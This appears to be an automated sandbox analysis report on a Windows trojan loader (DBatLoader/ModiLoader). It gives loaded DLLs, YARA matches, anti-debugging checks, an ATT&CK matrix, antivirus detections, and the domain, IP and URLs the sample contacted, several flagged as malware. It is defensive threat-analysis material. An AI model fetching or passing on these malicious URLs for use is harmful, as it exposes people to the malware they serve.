            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: ieproxy.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeSection loaded: mssip32.dllJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: UAHIzSm2x2.exeStatic file information: File size 1161216 > 1048576

            Data Obfuscation

            barindex
            Yara detected DBatLoader
            Source: Yara matchFile source: 0.2.UAHIzSm2x2.exe.22f65a8.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.UAHIzSm2x2.exe.2890000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.UAHIzSm2x2.exe.22f65a8.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.3461173693.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3446485255.00000000022F6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A8798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_028A8798
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028932FC push eax; ret 0_2_02893338
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028BD2FC push 028BD367h; ret 0_2_028BD35F
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_0289635A push 028963B7h; ret 0_2_028963AF
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_0289635C push 028963B7h; ret 0_2_028963AF
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028BD0AC push 028BD125h; ret 0_2_028BD11D
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028BD1F8 push 028BD288h; ret 0_2_028BD280
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028BD144 push 028BD1ECh; ret 0_2_028BD1E4
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A86B8 push 028A86FAh; ret 0_2_028A86F2
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_02896738 push 0289677Ah; ret 0_2_02896772
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_02896736 push 0289677Ah; ret 0_2_02896772
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_0289C4EC push ecx; mov dword ptr [esp], edx0_2_0289C4F1
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_0289D520 push 0289D54Ch; ret 0_2_0289D544
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_0289CB6C push 0289CCF2h; ret 0_2_0289CCEA
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A788C push 028A7909h; ret 0_2_028A7901
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A68C8 push 028A6973h; ret 0_2_028A696B
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A68C6 push 028A6973h; ret 0_2_028A696B
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028AE9E8 push ecx; mov dword ptr [esp], edx0_2_028AE9ED
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A890E push 028A8948h; ret 0_2_028A8940
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028AA918 push 028AA950h; ret 0_2_028AA948
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A8910 push 028A8948h; ret 0_2_028A8940
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028AA917 push 028AA950h; ret 0_2_028AA948
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_0289C95E push 0289CCF2h; ret 0_2_0289CCEA
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A2EE0 push 028A2F56h; ret 0_2_028A2F4E
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028BBFA0 push 028BC1C8h; ret 0_2_028BC1C0
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A2FEB push 028A3039h; ret 0_2_028A3031
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A2FEC push 028A3039h; ret 0_2_028A3031
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A5DFC push ecx; mov dword ptr [esp], edx0_2_028A5DFE
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028AA954 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_028AA954
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028958B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028958B4
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.00000000007E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW;
            Source: UAHIzSm2x2.exe, 00000000.00000002.3445632764.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000079E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeAPI call chain: ExitProcess graph end nodegraph_0-29066

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028AF024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_028AF024
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_028A8798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_028A8798
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02895A78
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: GetLocaleInfoA,0_2_0289A790
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: GetLocaleInfoA,0_2_0289A744
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02895B84
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_0289918C GetLocalTime,0_2_0289918C
            Source: C:\Users\user\Desktop\UAHIzSm2x2.exeCode function: 0_2_0289B70C GetVersionExA,0_2_0289B70C

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts            		1
            Native API            		1
            Valid Accounts            		1
            Valid Accounts            		1
            Valid Accounts            		OS Credential Dumping1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading            		1
            Access Token Manipulation            		1
            Access Token Manipulation            		LSASS Memory1
            Query Registry            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Virtualization/Sandbox Evasion            		Security Account Manager111
            Security Software Discovery            		SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information            		NTDS1
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture113
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information            		LSA Secrets1
            System Network Connections Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials1
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync24
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            UAHIzSm2x2.exe78%VirustotalBrowse
            UAHIzSm2x2.exe88%ReversingLabsWin32.Trojan.ModiLoader

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://amazonenviro.com:443/245_Aiymwhpjxsg100%Avira URL Cloudmalware
            http://amazonenviro.com/245_Aiymwhpjxsg100%Avira URL Cloudmalware
            http://amazonenviro.com/245_AiymwhpjxsgJh0%Avira URL Cloudsafe
            http://crl.microsM0%Avira URL Cloudsafe
            http://amazonenviro.com/~ha~0%Avira URL Cloudsafe
            http://amazonenviro.com/50%Avira URL Cloudsafe
            http://amazonenviro.com/245_AiymwhpjxsgP0%Avira URL Cloudsafe
            https://amazonenviro.com/245_AiymwhpjxsgLocationETagAuthentication-InfoAgeAccept-RangesLast-Modified0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Aiymwhpjxsg100%Avira URL Cloudmalware
            https://amazonenviro.com/u0%Avira URL Cloudsafe
            http://amazonenviro.com/245_AiymwhpjxsgC0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Aiymwhpjxsgerse0%Avira URL Cloudsafe
            http://amazonenviro.com/245_Aiymwhpjxsgxk6v0%Avira URL Cloudsafe
            https://amazonenviro.com45_Aiymwhpjxsgb0%Avira URL Cloudsafe
            https://amazonenviro.com/245_AiymwhpjxsgJh0%Avira URL Cloudsafe
            https://amazonenviro.com/245_AiymwhpjxsgWk0%Avira URL Cloudsafe
            http://amazonenviro.com/245_Aiymwhpjxsg.mui0%Avira URL Cloudsafe
            http://amazonenviro.com:80/245_Aiymwhpjxsgg0%Avira URL Cloudsafe
            http://amazonenviro.com/Bbe0%Avira URL Cloudsafe
            http://amazonenviro.com/245_Aiymwhpjxsg00%Avira URL Cloudsafe
            http://amazonenviro.com/245_Aiymwhpjxsg10%Avira URL Cloudsafe
            http://amazonenviro.com:80/245_Aiymwhpjxsggclose0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Aiymwhpjxsg00%Avira URL Cloudsafe
            https://amazonenviro.com/W0%Avira URL Cloudsafe
            http://amazonenviro.com/245_Aiymwhpjxsg50%Avira URL Cloudsafe
            https://amazonenviro.com/245_Aiymwhpjxsgc0%Avira URL Cloudsafe
            http://amazonenviro.com/0%Avira URL Cloudsafe
            http://amazonenviro.com:80/245_Aiymwhpjxsg100%Avira URL Cloudmalware
            http://amazonenviro.com/245_Aiymwhpjxsg(0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Aiymwhpjxsg20%Avira URL Cloudsafe
            https://amazonenviro.com/245_AiymwhpjxsgX0%Avira URL Cloudsafe
            http://amazonenviro.com:80/245_AiymwhpjxsgW0%Avira URL Cloudsafe
            http://amazonenviro.com:80/245_Aiymwhpjxsg20F0%Avira URL Cloudsafe
            https://amazonenviro.com/0%Avira URL Cloudsafe
            http://amazonenviro.com:80/245_AiymwhpjxsggT0%Avira URL Cloudsafe
            http://amazonenviro.com:80/245_Aiymwhpjxsgged0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_AiymwhpjxsgT0%Avira URL Cloudsafe
            https://amazonenviro.com/50%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Aiymwhpjxsgclose0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Aiymwhpjxsgy0%Avira URL Cloudsafe
            http://amazonenviro.com/U0%Avira URL Cloudsafe
            http://amazonenviro.com/M0%Avira URL Cloudsafe
            http://amazonenviro.com/d0%Avira URL Cloudsafe
            https://amazonenviro.com:443/245_Aiymwhpjxsged0%Avira URL Cloudsafe
            http://amazonenviro.com/245_Aiymwhpjxsgl0%Avira URL Cloudsafe
            http://amazonenviro.com:80/245_Aiymwhpjxsg80%Avira URL Cloudsafe
            http://amazonenviro.com/245_Aiymwhpjxsgt0%Avira URL Cloudsafe
            https://amazonenviro.com/245_Aiymwhpjxsgk0%Avira URL Cloudsafe
            http://amazonenviro.com:80/245_Aiymwhpjxsgg20%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            amazonenviro.com
            		166.62.27.188
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://amazonenviro.com/245_Aiymwhpjxsgtrue
              • Avira URL Cloud: malware
              		unknown
              https://amazonenviro.com/245_Aiymwhpjxsgfalse
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://amazonenviro.com:443/245_AiymwhpjxsgUAHIzSm2x2.exe, 00000000.00000003.2956290671.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3053706651.0000000000880000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://amazonenviro.com/5UAHIzSm2x2.exe, 00000000.00000003.2956388004.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://amazonenviro.com/~ha~UAHIzSm2x2.exe, 00000000.00000003.3114546079.0000000000858000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.microsMUAHIzSm2x2.exe, 00000000.00000003.3053706651.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2301934670.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2418848234.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2760643437.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2956290671.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2897902282.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.3114546079.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000086B000.00000004.00000020.00020000.00000000.sdmp, UAHIzSm2x2.exe, 00000000.00000003.2282231341.000000000082D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://amazonenviro.com/245_AiymwhpjxsgJhUAHIzSm2x2.exe, 00000000.00000003.2898002791.000000000082E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://amazonenviro.com/245_AiymwhpjxsgPUAHIzSm2x2.exe, 00000000.00000002.3445632764.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
